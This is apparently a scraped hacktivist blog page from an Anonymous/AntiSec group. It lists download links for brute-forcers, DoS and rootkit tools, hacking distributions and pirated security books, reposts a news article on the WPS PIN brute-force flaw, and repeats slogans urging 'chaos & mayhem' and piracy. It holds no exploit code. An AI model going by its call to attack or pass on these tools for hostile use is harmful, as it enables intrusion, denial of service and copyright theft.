      3) Clear your HDD’s every month or so (This makes sure you are never in a botnet and your secure.

      4) Get TrueCrypt!! Google it and use it.
(Hidden OS in truecrypt http://pastebin.com/rm43fJjK )

      5) Configure ALL or most of your programs to only work under a proxy or VPN.

If you ever need or want to request a tutorial, then join our IRC (above) and our channel #Tutorials and ask, We will try our best :)

By AntiSec Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare..

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiSOPA
- #ANTIPIPA
- #democracy
- #free
- #freedom
- #fight
- #freeweb
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #Toolz
- #InterWebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #ows
- #occupywallstreet
- #OpCensorThis
- #occupytogether
- #occupytheworld
- #OccupyEveryhere
1 year ago
Permalink

View Separately

By AntiSec Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys
#Anonymous #H4ck3rz Will Prepare You to Share chaos & mayhem for #LulzWar

Ultimate Encoder - PHP Encoder with multiple compression Download

Patator | multi-purpose brute-forcer Download

Reaver brute force attack Tool Download

Assassin DoS 2.0.3 Download

Big Ultra HackPack 155 tools in 1 Download

Ultimate AnonBrowser 1.0 linux Download

DDos Tracer Download

DirBuster-0.12 Download

GoLISMERO Download

HashCodeCracker Download

Jynx-Kit-Pub Download

RTCA (Portable Windows Forensic Analysis Tool) Download

findmyhash Download

john-1.7.8 Download

joomscan Download

joomscan (Linux) Download

malware_analyser 3.3 Download

ncrack-0.4 ALPHA Download

nmapsi4-0.3-beta1 Download

sqlsus-0.7 Download

sqlsus_0.7-1_all (Debian) Download

uniscan5.2 Download

wafp-0.01-26c3 Download

wifite_r68 Download

PHP Vulnerability Hunter 1.1.4.6 Download

Mantra Security Toolkit Download

Tor Browser Download

AnonDroid Download

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare

By AntiSec Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiSOPA
- #ANTIPIPA
- #democracy
- #free
- #freedom
- #fight
- #freeweb
- #InterWebz
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #Liberty
- #ows
- #occupywallstreet
- #OpCensorThis
- #occupytogether
- #occupytheworld
- #OccupyEveryhere
1 year ago
Permalink

View Separately

ALL LOLHACKERS #school4lulz Lessons can be found H3R3:

http://laurelai.info/mirrors/BlackHatAcademy/lolhackers/

#OpHackStorm ☣

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☣ I’m a Pirate ☠
I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

Long live the ones who dare..

By AntiSec Productions NO©

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE

- #school4lulz
- #free
- #antiSOPA
- #Anon
- #anonymous
- #anonymiss
- #antisec
- #anonfamily
- #democracy
- #free
- #freedom
- #fight
- #freeweb
- #ANTIPIPA
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #insurgency
- #insurgent
- #Independence
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #OccupyEveryhere
- #ows
- #OpCensorThis
- #OpHackStorm
- #OpShitStorm
1 year ago
Permalink

View Separately

Brute Force tools to crack Wi-Fi security in hours, millions of wireless routers vulnerable (Expect Us)

If you set WPA/WPA2 security protocol on your home or small business wireless router, and you think your Wi-Fi is secure, there two recently released brute force tools that attackers may use to bypass your encryption and burst your security bubble. The irony is that the vulnerability which can be exploited was intended to be a security strength, a usability issue to help the technically clueless setup encryption on their wireless networks. Wi-Fi Protected Setup (WPS) is enabled by default on most major brands of wireless routers including Belkin, Buffalo, D-Link, Cisco’s Linksys and Netgear, leaving millions of wireless routers around the world vulnerable to brute force attacks which can crack the Wi-Fi router’s security in two to ten hours.

Most wireless routers come with a WPS personal identification number (PIN) printed on the device. When a user is setting up a wireless home network via a network setup wizard, enabling encryption is often as easy as pushing a button on the router and then entering the eight digit PIN which came with it. When an attacker is attempting to brute force the PIN and an incorrect value was entered, a message is sent that basically tells an attacker if the first half of the PIN was right or not. Additionally, according to Stefan Viehbock, the security researcher who reported the flaw, “The 8th digit of the PIN is always the checksum of digit one to digit seven,” meaning it only takes an attacker about 11,000 brute force guesses to own the password. Unfortunately most wireless routers don’t have a lockout policy after several failed password attempts.

Viehbock reported the Wi-Fi Protected Setup (WPS) PIN brute force vulnerability to the Department of Homeland Security’s U.S. Computer Emergency Readiness Team (US-CERT). US-CERT issued a warning which included, due to a “design flaw” in WPS, “an attacker within range of the wireless access point may be able to brute force the WPS PIN and retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service….The lack of a proper lock out policy after a certain number of failed attempts to guess the PIN on some wireless routers makes this brute force attack that much more feasible.”

Viehbock released a whitepaper, “Brute forcing Wi-Fi Protected Setup - When poor design meets poor implementation” [PDF] as well as a proof-of-concept brute force tool called wpscrack which is capable of cracking a home Wi-Fi network in about two hours but does not work with all Wi-Fi adapters.

Tactical Network Solutions (TNS), another security team, had also discovered the WPS wireless router flaw that comes enabled by default in “roughly 95% of modern consumer-grade access points.” After the vulnerability went public, TNS released Reaver, an open-source tool that also exploits the vulnerability via a brute force attack. “Once you have the WPS pin you can instantly recover the WPA passphrase, even if the owner changes the passphrase,” TNS reported. “Reaver is capable of breaking WPS pins and recovering the plain text WPA/WPA2 passphrase of the target access point in approximately 4-10 hours (attack time varies based on the access point).”

The US-CERT advisory states, “We are currently unaware of a practical solution to this problem.” The recommended workaround is to disable WPS. “Within the wireless router’s configuration menu, disable the external registrar feature of Wi-Fi Protected Setup (WPS). Depending on the vendor, this may be labeled as external registrar, router PIN, or Wi-Fi Protected Setup.”

#OpHackStorm ☣

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☣ I’m a Pirate ☠
I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

Long live the ones who dare..

NO©

- #Free
- #ANTISOPA
- #H4ck3rz
- #Privacy
- #Hacker
- #Hacking
- #Freedom
- #FreeWeb
- #Anon
- #Anonymous
- #OccupyEveryhere
- #OccupyTheWorld
- #WeAreLegion
- #REVOLUTION
- #OccupyTogether
- #OccupyWallStreet
- #OWS
- #Anonymiss
- #Fight
- #Rebel
- #Rebelion
- #Insurgency
- #Hacktivist
- #Insurgent
- #LulzWarfare
- #AntiSec
- #AnonFamily
- #Lulztime
- #LuLzWar
- #SailStrong
1 year ago
Permalink

View Separately

ISO (Operating Systems)

BlackBuntu v0.3 (torrent)
BlackBuntu based off of Ubuntu 10.10, the Linux 2.6.3 kernel, and Gnome 2.32.0. Ubuntu, which is in turn based off debian, allows you to make great use of the Debian package system.

Download : http://db.tt/ryqwKV72

Backtrack 5 r1(torrent)
For those of you Linux users that like networking, hacking and just experimenting with Linux in general, this is a great distro for you. Backtrack Linux is a Ubuntu-based, penetration testing, distribution. It specialises in the area of hacking and network testing. So if you are looking for something new and different, give Backtrack a try.

Download : http://db.tt/09hrfU2L

Backtrack 4 r2
BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Download : http://min.us/lbkd0uLGt4m6Fv

Ubuntu 11.10
With this release, Ubuntu has completely switched over to Gnome 3 stack. Many applications and application indicators have been ported to GTK3. Gnome Shell as well a classic Gnome interface, however are not installed by default but their up to date versions are available in repositories. The two default sessions are Ubuntu (Unity 3D) and Ubuntu 2D (Unity 2D). On a fresh installation, you will be logged into Unity 3D interface if your system supports 3D acceleration.

Download : http://min.us/lbtBa0oyCILZOn

BackBox 2.01
BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking.
Lots of good easy to use toolz.

Download : http://expect-us.net/DL/backbox-2.01-i386.iso

Live Hacking DvD
Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification.

Download : http://min.us/l7aRh97noMO8J

Pinguy 11.10
Pinguy OS an out-of-the-box working operating system for everyone, not just geeks. This version is still a little buggy.

Download : http://min.us/lbhcyrj1ADc97j

Pinguy 11.04
Pinguy OS an out-of-the-box working operating system for everyone, not just geeks.

Download : http://min.us/ltSgXDgDxo8iC

Caine 2.5.1
CAINE (Computer Aided INvestigative Environment)
The project does not aim to propose yet another forensic tool or a framework for collecting open source programs, because many forensic distributions already exist (e.g., Helix, FCCU, Deft). The CAINE forensic framework contains a collection of tools wrapped up into a user friendly environment. Furthermore introduces novel important features; it aims to fill the interoperability gap across different forensic tools, it provides a homogeneous GUI that guides digital investigators during the acquisition and analysis of electronic evidence, and it offers a semi-automatic process for the documentation and report compilation.

Download : http://min.us/lVOLD6HhvhKRU

Remnux 2.0
REMnux: A Linux Distribution for Reverse-Engineering Malware
REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software.
REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that’s listening on the appropriate ports.

Download : http://min.us/lbgGAuNgeXCPxE

Security Onion live
Security Onion is a Linux distro for IDS (Intrusion Detection System) and NSM (Network Security Monitoring). It’s based on Xubuntu 10.04 and contains Snort, Suricata, Sguil, Squert, Xplico, tcpreplay, scapy, hping, and many other security tools.

Download : http://min.us/lnC7GPnAN2PXf

Bodhi 1.2
This fantastic distribution is not merely another Ubuntu derivative. Bodhi delivers a smooth installation process, and an utterly perfected desktop environment that surely left developers locked in dark basements for weeks on end. Enlightenment may be exactly what all the other distributions are missing. The Enlightenment desktop is lightweight and highly customizable making this distribution a top choice for new or old systems. Bodhi comes with a minimal list of pre-installed applications as well, perfect if you are picky about what you like.

Download : http://min.us/lEDj1MEuZJm8V

openSuse 12.1
openSUSE is one of the most popular desktop distros available. This time around its version 12.1 that has been released. If you arent familiar with openSUSE then you should know that it comes in KDE, GNOME, Xfce and LXDE versions.

Download : http://min.us/lQvlpyp67RH60

Cherimoya 0.2.4
A Linux Distro based on Chakra GNU/Linux (in turn derived from Arch), conceptualized to be easy to use and full of features, yet offering lots of freedom. It is designed for Anonymous, holding many useful tools such as LOIQ, pyLoris, etc. Download : http://min.us/lblFCcMmdDb4aM

Hacking Lab
This ist the LiveCD project of Hacking-Lab (www.hacking-lab.com). It gives you OpenVPN access into Hacking-Labs Remote Security Lab. The LiveCD iso image runs very good natively on a host OS, or within a virtual environment (VMware, VirtualBox). However, if you expect improved screen resolution, drag and drop support with your Host OS, then we recommend to use a VirtualBox Appliance. Please read the following readme to get familiar with downloading and using the LiveCD ISO image or VirtualBox appliance. h http://media.hacking-lab.com/largefiles/livecd/readme.txt www.hacking-lab.com). It gives you OpenVPN access into Hacking-Labs Remote Security Lab. The LiveCD iso image runs very good natively on a host OS, or within a virtual environment (VMware, VirtualBox). However, if you expect improved screen resolution, drag and drop support with your Host OS, then we recommend to use a VirtualBox Appliance. Please read the following readme to get familiar with downloading and using the LiveCD ISO image or VirtualBox appliance. h http://media.hacking-lab.com/largefiles/livecd/readme.txt
Download : http://min.us/lhAZoC7FsjAZX

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

Long live the ones who dare..

#OpHackStorm
Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

- #Anon
- #Anonymous
- #Anonymiss
- #AntiSec
- #AnonFamily
- #antiSOPA
- #democracy
- #Free
- #Freedom
- #FreeWeb
- #Fight
- #Hacktivist
- #H4ck3rz
- #Hacker
- #Hacking
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #OpCensorThis
- #OpHackStorm
- #OWS
- #OccupyEveryhere
- #occupytheworld
- #occupytogether
- #occupywallstreet
- #REVOLUTION
- #Rebelion
1 year ago
Permalink

View Separately

Learn How-To-Hack By Start Reading

B00KS & TXT

Bactrack 5 Beginners

Download

LOL Hackers

Download

Text files

See All

The C programming language

Download

Intro to Linux

Download

Advanced linux programming

Download

13 Things that the GOV do not want you to know

Download

Professional Penetration Testing

Linux 101 Hacks

Hacking

Web and Programming

Networking

Security

SQL Strings + Dorks list

Download

Hackers Black Book

Download

500 Hacking Tutorialz

Download

Hardware Hacking

Download

Hacking and Security Guides

Download

Anonymous Care Package

Download

Intro to Keyloggers & more

Download

SQL Injection Attacks and Defense

Bypassing Anti-Virus

Virtual HoneyPots

Extreme Exploits

The Rootkit Arsenal

Cyber Fruad

Shell C0D3r

Professional Penetration Testing

Download

A lot of books compiled together

Download

The-little-black-book-of-computer-viruses

Download

Windows Forensic Analysis

Download

Mobile Malware Attacks and Defense

Download

Linux System Administration

Download

The C Book

Download

Programming from the Ground Up

Download

Smashing The Stack For Fun And Profit

Download

Postgre SQL

Download

PHP Language Reference

MySQL 5.6 Reference

FootPrinting

You Tube Hacking

Gmail Hacking

Grey Hat Python

HTML5 Step by Step

Learn XML

Grey Hat Hacking

Beginning in SQL

Beginning Java 7

Java Programming Analysis to program

Download

Intro to Java Programming

Download

Java 24 Hour Training

Download

JavaScript & jQuery

Download

Web Application Hackers’s Handbook

Download

By AntiSec Productions NO©

Share by #OpHackStorm

I’m a Pirate™

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

- #Anon
- #antiSOPA
- #AntiSec
- #AnonFamily
- #Anonymiss
- #Anonymous
- #Democracy
- #Fight
- #freedom
- #free
- #freeweb
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #Hacktivist
- #Insurgent
- #Insurgency
- #LULZ
- #LuLzWar
- #lulztime
- #LulzWarfare
- #OccupyTogether
- #OccupyWallStreet
- #OWS
- #OpHackStorm
- #OccupyEveryhere
- #occupytheworld
- #OpCensorThis
- #privacy
1 year ago
Permalink

Joe McCray - Advanced SQL Injection - LayerOne 2009

SQL Injection is a vulnerability that is often missed by web application security scanners, and its a vulnerability that is often rated as NOT exploitable by security testers when it actually can be exploited.

Advanced SQL Injection is a presentation geared toward showing security professionals advanced exploitation techniques for situations when you must prove to the customer the extent of compromise that is possible.

Watch The Master and Learn

#OpHackStorm

Putting toys in the hands of Boys

#Anonymous #H4ck3rz

Will Prepare You to Share chaos & mayhem for #LulzWar

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

- #SQLi
- #Free
- #ANTISOPA
- #H4ck3rz
- #Privacy
- #Hacker
- #Hacking
- #Freedom
- #FreeWeb
- #Anon
- #Anonymous
- #OccupyEveryhere
- #OccupyTheWorld
- #WeAreLegion
- #REVOLUTION
- #OccupyTogether
- #OccupyWallStreet
- #OWS
- #Anonymiss
- #Fight
- #Rebel
- #Rebelion
- #Insurgency
- #Hacktivist
- #Insurgent
- #LulzWarfare
- #AntiSec
- #AnonFamily
- #Lulztime
- #LuLzWar
1 year ago
Permalink

33 Plays
Expect UsAnonymous

This is a Anonymous Ring Tone Only The Pure can USE iT

We Are Anonymous

We Are Legion

We Do Not Forgive

We Do Not Forget

Expect Us

Following Many Families Requests :)

H3R3 are the Download LiNK:

http://www.mediafire.com/file/32drp0i2fgp10jo/Anon-RingTone.mp3

ENjOY & SHARE

NO©

☢☠☢

Share by MasterPirate™ ✔

- #Privacy
- #Free
- #Hacker
- #Hacking
- #Freedom
- #FreeWeb
- #Anon
- #Anonymous
- #WeAreLegion
- #REVOLUTION
- #OWS
- #Anonymiss
- #Fight
- #Rebel
- #Rebelion
- #Hacktivist
- #LulzWarfare
- #AntiSec
- #AnonFamily
- #LuLzWar
- #Lulztime
- #SailStrong
- #OpCensorThis
- #LULZ
- #OpHackStorm
1 year ago
Permalink

High Orbits and Slowlorises: understanding the Anonymous attack tools

This rocket needs boosters

STARTUP GUIDE

How to create a bootable Windows 7 USB flash drive

Windows 7 USB DVD Download Tool

Manual Creation

Bonus: install any edition of Windows 7

Enable Windows 7 God Mode

How to Enable Windows 7 God Mode

How To Install Tor On Apple Mobile Devices

By AntiSec Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys
#Anonymous #H4ck3rz Will Prepare You to Share chaos & mayhem for #LulzWar

Learn How-To-Hack By Start Reading

B00KS & TXT

About

Twitter

High Orbits and Slowlorises: understanding the Anonymous attack tools

This rocket needs boosters

STARTUP GUIDE

How to create a bootable Windows 7 USB flash drive

Windows 7 USB DVD Download Tool

Manual Creation

Bonus: install any edition of Windows 7

Enable Windows 7 God Mode

How to Enable Windows 7 God Mode

How To Install Tor On Apple Mobile Devices

By AntiSec Productions NO©™ Share by #OpHackStorm #OpShitStorm Joint-Venture Putting toys in the hands of Boys #Anonymous #H4ck3rz Will Prepare You to Share chaos & mayhem for #LulzWar

Learn How-To-Hack By Start Reading

B00KS & TXT

About

Twitter

By AntiSec Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys
#Anonymous #H4ck3rz Will Prepare You to Share chaos & mayhem for #LulzWar